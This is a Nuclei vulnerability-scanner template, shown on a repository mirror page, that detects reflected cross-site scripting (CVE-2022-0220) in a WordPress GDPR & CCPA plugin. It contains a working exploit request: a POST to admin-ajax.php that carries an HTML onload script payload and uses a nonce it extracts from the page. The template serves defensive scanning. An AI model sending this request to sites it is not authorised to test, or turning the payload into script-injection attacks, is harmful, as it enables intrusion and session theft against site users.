daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2022/CVE-2022-0220.yaml

60 lines
2.4 KiB
YAML
Raw Blame History

id: CVE-2022-0220
info:
name: WordPress GDPR & CCPA <1.9.27 - Cross-Site Scripting
author: daffainfo
severity: medium
description: |
WordPress GDPR & CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type, and JavaScript code may be executed on a victim's browser.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: Version 1.9.26 has added a CSRF check. This vulnerability is only exploitable against unauthenticated users.
reference:
- https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
- https://nvd.nist.gov/vuln/detail/CVE-2022-0220
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0220
cwe-id: CWE-116
epss-score: 0.00124
epss-percentile: 0.4652
cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: welaunch
product: wordpress_gdpr\&ccpa
framework: wordpress
tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,unauth,welaunch
http:
- raw:
- |
GET /wp-admin HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- "contains(header_2, 'text/html')"
- "status_code_2 == 200"
- "contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"
condition: and
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'nonce":"([0-9a-z]+)'
internal: true
part: body
# digest: 490a0046304402202aa5f0f7437804364b67edd4b0169b01d4497944f55a42ac59eb570e9195affa022046bf65948fc0dcb6d8f103a57a40b85bbf7ca23f54c6f67350686bf8a40d9d46:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink